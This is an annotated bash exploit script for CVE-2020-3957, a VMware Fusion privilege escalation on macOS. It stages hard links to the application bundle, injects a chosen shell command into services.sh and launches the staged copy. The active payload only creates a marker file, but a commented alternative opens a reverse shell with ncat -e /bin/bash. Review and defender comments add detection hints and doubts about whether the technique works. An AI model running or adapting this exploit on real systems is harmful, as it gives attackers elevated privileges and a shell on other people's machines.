#!/bin/bash
#
# Exploit Title: VMware Fusion Elevation Of Privilege
# Date: 2020-06-02
# Exploit Author: Rich Mirch of Critical Start, TeamARES
# CVE: CVE-2020-3957
#

#set -x

# Payload: the one shell line that is later inserted into the staged copy of
# services.sh. The active default only creates a marker file, so the owner of
# /tmp/test.123 afterwards records which account the inserted line ran under.
# The commented-out alternatives are kept exactly as the author published them.
# Note: this will execute several times
CMD='touch /tmp/test.123'
#CMD='/usr/local/bin/ncat -e /bin/bash 127.0.0.1 9003'
#CMD='echo WOOT: $(/usr/bin/id)| /usr/bin/wall'

# Pre-flight check: stop if a process matching "VMware Fusion" already exists.
# pgrep -q (BSD/macOS) prints nothing and reports the match only through its
# exit status, which is what the if tests.
# NOTE(review): presumably a running instance would interfere with starting
# the staged copy later in the script - the script does not say why.
if pgrep -q "VMware Fusion"
then
  echo "Error: VMware Fusion is running"
  exit 1
fi

# Create a private staging directory under the invoking user's home; mktemp -d
# replaces the XXXXX suffix with random characters.
# NOTE(review): $HOME is unquoted, so a home path containing whitespace would
# be word-split before mktemp sees it.
stage=$(mktemp -d $HOME/.vmware.stager.XXXXX)

# ${stage?} aborts only when stage is unset. A failed mktemp leaves it set but
# empty, which this form does not catch (${stage:?} would).
echo "Staging files in ${stage?}; remove when done"
# Mirror the application bundle's directory tree into the stage.
# find -d (BSD) traverses depth-first, so sub-directories are listed before
# their parents and the bundle root comes last.
# NOTE(review): read without -r and with default IFS trims leading/trailing
# whitespace and interprets backslashes in directory names.
find /Applications/VMware\ Fusion.app/ -d -type d | while read src_dir
do
  # Path relative to /Applications, e.g. "VMware Fusion.app/Contents/...".
  dst_dir=${src_dir##/Applications/}
  mkdir -p "$stage/$dst_dir"
  (
    # Subshell keeps the cd local to this iteration.
    cd "$stage/$dst_dir"
    #echo src=$src_dir
    #echo find "$src_dir" -type f -print0 -maxdepth 0
    # ln with a single operand creates a hard link of the same name in the
    # current directory. The staged tree therefore consists of user-created
    # directories whose entries point at the installed files' own inodes, so
    # content, owner and mode bits are those of the originals.
    # Defender note: regular files under a home directory that share an inode
    # with files inside /Applications/VMware Fusion.app (link count > 1) are
    # the on-disk trace this step leaves.
    find "$src_dir" -type f -maxdepth 1 -exec ln "{}" \;
  )
  #exit
done

# The while loop above ran as a pipeline stage, i.e. in a subshell, so the
# dst_dir assignments made inside it are not visible from this point on.
echo stage=$stage make sure to delete this when done

# inject $CMD into services.sh
# BSD sed syntax: -i .orig edits in place and keeps the previous file as
# services.sh.orig; "2i\" inserts the expanded $CMD as a new line before
# line 2 of the script.
# $dst_dir was only assigned inside the piped while loop earlier in the script
# and is empty here, so the path resolves to "$stage//VMware Fusion.app/...".
# NOTE(review): in-place editing normally writes a new file instead of
# modifying the hard-linked inode, so the installed services.sh is presumably
# left unchanged - confirm by comparing hashes of both files.
sed -i .orig "2i\\
$CMD
" "$stage/$dst_dir/VMware Fusion.app/Contents/Library/services/services.sh"

# Start the staged copy of the main executable in the background with stderr
# discarded.
# NOTE(review): the script does not show the privileged side. Presumably a
# component started by the application locates services.sh relative to the
# path it was launched from and so runs the edited copy - confirm against the
# vendor advisory for CVE-2020-3957.
# Defender note: the observable event is the "VMware Fusion" executable being
# run from a path outside /Applications; the vendor's update for
# CVE-2020-3957 is the remediation.
"$stage/$dst_dir/VMware Fusion.app/Contents/MacOS/VMware Fusion" 2>/dev/null &
# PID of the background job just started.
p=$!
echo "Sleeping for 5 seconds"
# Fixed delay before the application is stopped again.
sleep 5
echo "Killing pid=${p?}"
# kill without a signal argument sends SIGTERM; ${p?} aborts if p is unset.
kill ${p?}
# Wait for the background job to exit before printing the final message.
wait
echo woot
